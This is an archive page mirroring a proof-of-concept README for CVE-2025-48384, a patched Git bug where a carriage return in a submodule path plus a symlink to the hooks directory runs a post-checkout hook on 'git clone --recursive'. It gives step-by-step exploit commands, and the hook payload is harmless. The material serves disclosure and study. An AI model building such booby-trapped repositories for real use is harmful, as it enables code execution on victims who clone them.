Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-48384 PoC — Git allows arbitrary code execution through broken config quoting

Source
https://github.com/jacobholtz/CVE-2025-48384-poc
Associated Vulnerability
Title:Git allows arbitrary code execution through broken config quoting (CVE-2025-48384)
Description:Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When reading a config value, Git strips any trailing carriage return and line feed (CRLF). When writing a config entry, values with a trailing CR are not quoted, causing the CR to be lost when the config is later read. When initializing a submodule, if the submodule path contains a trailing CR, the altered path is read resulting in the submodule being checked out to an incorrect location. If a symlink exists that points the altered path to the submodule hooks directory, and the submodule contains an executable post-checkout hook, the script may be unintentionally executed after checkout. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Description
PoC for CVE-2025-48384
Readme
# CVE-2025-48384-poc

CVE-2025-48384 takes the form of an improper link resolution (link following) vulnerability in git. Specifically, filenames with carriage returns are improperly parsed in `.git/config`, and including a symlink to point a git hook executable located in a submodule as the submodule hooks directory may lead to arbitrary code execution when the repo is cloned with `git clone --recursive`.

## Steps to reproduce the poc:
1. Create two repositories, poc and submodule
2. In submodule, create a `post-checkout` git hook to execute code when the 
poc repo is cloned recursively:
```bash
#!/bin/bash
touch ~/hackedlol
```
3. In poc, add the submodule repo with `git submodule add https://github.com/<your submodule repo>.git sub`
4. Add a carriage return to the newly created sub folder with `git mv sub $(printf "sub\r")`
5. Echo `printf "\tpath = \"sub\r\"\n"` to .gitmodules and remove the original path.
6. Create a symlink to the hooks folder in your local .git directory with `ln -s .git/modules/sub/hooks sub`
7. Add everything to the repo
8. Hopefully it works lol

## Sources
 - https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
 - https://github.com/git/git/commit/05e9cd64ee23bbadcea6bcffd6660ed02b8eab89#diff-8fbc2654131392c3018ecfc92462057b3bdc675cc674084c248bb0393a46b59f
File Snapshot

 [4.0K]  /data/pocs/455395ed28f2f575c33a21264a2aaa4c82e04509
├── [1.3K]  README.md
├── [  22]  sub -> .git/modules/sub/hooks
└── [4.0K]  sub\015

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →